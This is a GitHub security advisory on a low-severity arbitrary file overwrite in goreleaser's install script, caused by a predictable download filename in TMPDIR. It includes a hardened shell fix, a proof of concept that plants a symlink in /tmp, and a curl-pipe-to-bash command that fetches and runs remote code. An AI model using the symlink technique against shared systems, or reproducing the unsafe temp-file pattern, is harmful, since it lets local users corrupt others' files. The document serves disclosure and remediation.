
Arbitrary file overwrite vulnerability in www/docs/static/run

Low
caarlos0 published GHSA-2fvp-53hw-f9fc Jun 15, 2023

Package

goreleaser.com/static/run (Shell)

Affected versions

97db97df8763931bbe0760d28b54dbfc539927c1

Patched versions

265148c6612aeb5a3e9602738955c2ffa2569f33

Description

Summary


The goreleaser.com/static/run script allows local users to overwrite arbitrary files to which the user running the script has write access.

Details


This vulnerability is exposed when the TMPDIR environment variable is set to a non-empty value that points to a directory with unrestrictive permissions, for example the system temporary directory, which is typically world-writable.

By placing a symlink with the predictable filename that the run script downloads to in such a directory, any local user can cause the script to overwrite any file to which the user running it has write access.
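The root cause is a fixed, attacker-predictable filename in a shared directory. As an added example (not goreleaser's own code), a hardened stand-in for that download step: the archive goes into a freshly created mode-0700 directory from mktemp -d, and a write helper refuses any pre-existing entry, a planted symlink included. The function names safe_download_path and write_noclobber are assumptions.

```shell
#!/bin/sh
# Added example, not goreleaser's own code: a hardened stand-in for writing the
# archive to the fixed, attacker-predictable "$TMPDIR/goreleaser_Linux_x86_64.tar.gz".
set -eu

# Print a download target inside a freshly created private directory.
# mktemp -d makes a mode-0700 directory with a random suffix and fails instead
# of reusing an existing entry, so nothing pre-planted under TMPDIR can match.
safe_download_path() {
  name="$1"
  dir="$(mktemp -d "${TMPDIR:-/tmp}/goreleaser.XXXXXX")"
  printf '%s/%s\n' "$dir" "$name"
}

# Write CONTENT to TARGET only if nothing is there yet. The explicit test
# rejects a planted symlink (dangling or not); noclobber (set -C) then creates
# the file with an exclusive create (O_EXCL), so a link planted between the
# test and the open also makes the write fail instead of being followed.
write_noclobber() {
  target="$1"
  content="$2"
  if [ -e "$target" ] || [ -L "$target" ]; then
    echo "refusing to write: $target already exists" >&2
    return 1
  fi
  ( set -C; printf '%s' "$content" > "$target" )
}

# Demo: where the archive would now land (unique directory, owner-only access).
demo_target="$(safe_download_path goreleaser_Linux_x86_64.tar.gz)"
echo "download target: $demo_target"
rmdir "${demo_target%/*}"
```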

PoC


On a Linux x86_64 system:

$ export TMPDIR=/tmp
$ echo "Hello, world." >"$TMPDIR/canary.txt"
$ ln -s canary.txt "$TMPDIR/goreleaser_Linux_x86_64.tar.gz"  # to be done as some other user
$ curl -sfL https://goreleaser.com/static/run | bash  # per https://goreleaser.com/install/#bash-script
Using the OSS distribution...
Downloading GoReleaser v1.18.2...
Verifying checksums...
Could not verify signatures, cosign is not installed.
  • starting release...
  • could not find a config file, using defaults...
  • loading environment variablesgoreleaser_Linux_x86_64.tar.gz
  ⨯ release failed after 0s                  error=missing GITHUB_TOKEN, GITLAB_TOKEN and GITEA_TOKEN
$ stat --printf="%s\n" "$TMPDIR/canary.txt"
16905476
$ sha256sum "$TMPDIR/canary.txt" 
811e0c63e347f78f3c8612a19ca8eeb564eb45f0265ce3f38aec39c8fdbcfa10  /tmp/canary.txt
# matches sha256sum of goreleaser_Linux_x86_64.tar.gz from the 1.18.2 release

Impact


Arbitrary file overwrite. Anyone running the script in an environment where the TMPDIR environment variable points to a directory with unrestrictive permissions is affected.

Severity

Low (3.3 / 10)

CVSS base metrics

Attack vector: Local
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

CVE ID

No known CVE
